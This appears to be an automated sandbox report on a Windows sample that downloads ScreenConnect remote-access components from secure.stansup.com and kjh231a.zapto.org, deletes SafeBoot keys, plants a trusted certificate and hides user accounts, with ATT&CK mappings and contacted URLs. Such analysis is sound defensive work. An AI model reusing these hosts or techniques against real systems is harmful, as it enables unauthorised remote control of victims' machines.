                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00911806
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Deletes keys which are related to windows safe boot (disables safe mode boot)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 10.0.ScreenConnect.WindowsClient.exe.f70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 7740, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4228, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 2788, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		121
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  Inhibit System Recovery
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter                  		1
                  DLL Search Order Hijacking                  		1
                  DLL Search Order Hijacking                  		1
                  Obfuscated Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		2
                  Windows Service                  		2
                  Windows Service                  		1
                  Install Root Certificate                  		Security Account Manager34
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Timestomp                  		NTDS51
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit                  		1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		LSA Secrets2
                  Process Discovery                  		SSHKeylogging3
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking                  		Cached Domain Credentials51
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542315 Sample: Qjq85KfhBC.exe Startdate: 25/10/2024 Architecture: WINDOWS Score: 60 48 secure.stansup.com 2->48 50 kjh231a.zapto.org 2->50 52 4 other IPs or domains 2->52 60 Multi AV Scanner detection for submitted file 2->60 62 .NET source code references suspicious native API functions 2->62 64 Detected potential unwanted application 2->64 66 2 other signatures 2->66 9 Qjq85KfhBC.exe 2 2->9         started        11 ScreenConnect.ClientService.exe 2->11         started        14 svchost.exe 8 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 19 dfsvc.exe 133 110 9->19         started        23 WerFault.exe 19 16 9->23         started        70 Reads the Security eventlog 11->70 72 Reads the System eventlog 11->72 74 Deletes keys which are related to windows safe boot (disables safe mode boot) 11->74 25 ScreenConnect.WindowsClient.exe 11->25         started        28 WerFault.exe 2 14->28         started        46 127.0.0.1 unknown unknown 16->46 signatures6 process7 dnsIp8 54 kjh231a.zapto.org 79.110.49.185, 443, 49702, 49708 OTAVANET-ASCZ Germany 19->54 36 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 19->36 dropped 38 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 19->38 dropped 40 ScreenConnect.WindowsBackstageShell.exe, PE32 19->40 dropped 44 13 other files (none is malicious) 19->44 dropped 30 ScreenConnect.WindowsClient.exe 19 10 19->30         started        42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 23->42 dropped 68 Contains functionality to hide user accounts 25->68 file9 signatures10 process11 signatures12 76 Contains functionality to hide user accounts 30->76 33 ScreenConnect.ClientService.exe 30->33         started        process13 signatures14 56 Contains functionality to hide user accounts 33->56 58 Enables network access during safeboot for specific services 33->58

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Qjq85KfhBC.exe24%ReversingLabsWin32.Trojan.Generic

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exe0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://www.w3.or0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                  http://www.w3.o0%URL Reputationsafe
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/09/policy0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                  http://upx.sf.net0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  secure.stansup.com
                  		79.110.49.185
                  		truefalse
                    		unknown
                    kjh231a.zapto.org
                    		79.110.49.185
                    		truefalse
                      		unknown
                      default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                      		217.20.57.21
                      		truefalse
                        		unknown
                        fp2e7a.wpc.phicdn.net
                        		192.229.221.95
                        		truefalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                            		unknown
                            https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.configfalse
                              		unknown
                              https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configfalse
                                		unknown
                                https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configfalse
                                  		unknown
                                  https://secure.stansup.com/Bin/ScreenConnect.ClientService.exefalse
                                    		unknown
                                    https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exefalse
                                      		unknown
                                      https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllfalse
                                        		unknown
                                        https://secure.stansup.com/Bin/ScreenConnect.Client.dllfalse
                                          		unknown
                                          https://secure.stansup.com/Bin/ScreenConnect.Windows.dllfalse
                                            		unknown
                                            https://secure.stansup.com/Bin/ScreenConnect.Client.manifestfalse
                                              		unknown
                                              https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exefalse
                                                		unknown
                                                https://secure.stansup.com/Bin/ScreenConnect.Core.dllfalse
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe7dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdngsvchost.exe, 00000008.00000003.1417148795.000001E11B952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.application9ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd0svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.applicationngScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://secure.stansup.com/Bin/ScreenConnect.Client.application.dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://secure.stansup.comdfsvc.exe, 00000001.00000002.2221493797.0000021CD0489000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://secure.stansup.com/Bin/ScreenConnect.Client.application89Odfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.apdrdfsvc.exe, 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exekdfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.applicationgScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80604fg:Completsvchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://secure.stansup.com/Bin/ScreenConnect.Client.applicationXZ4dfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/sckensvchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
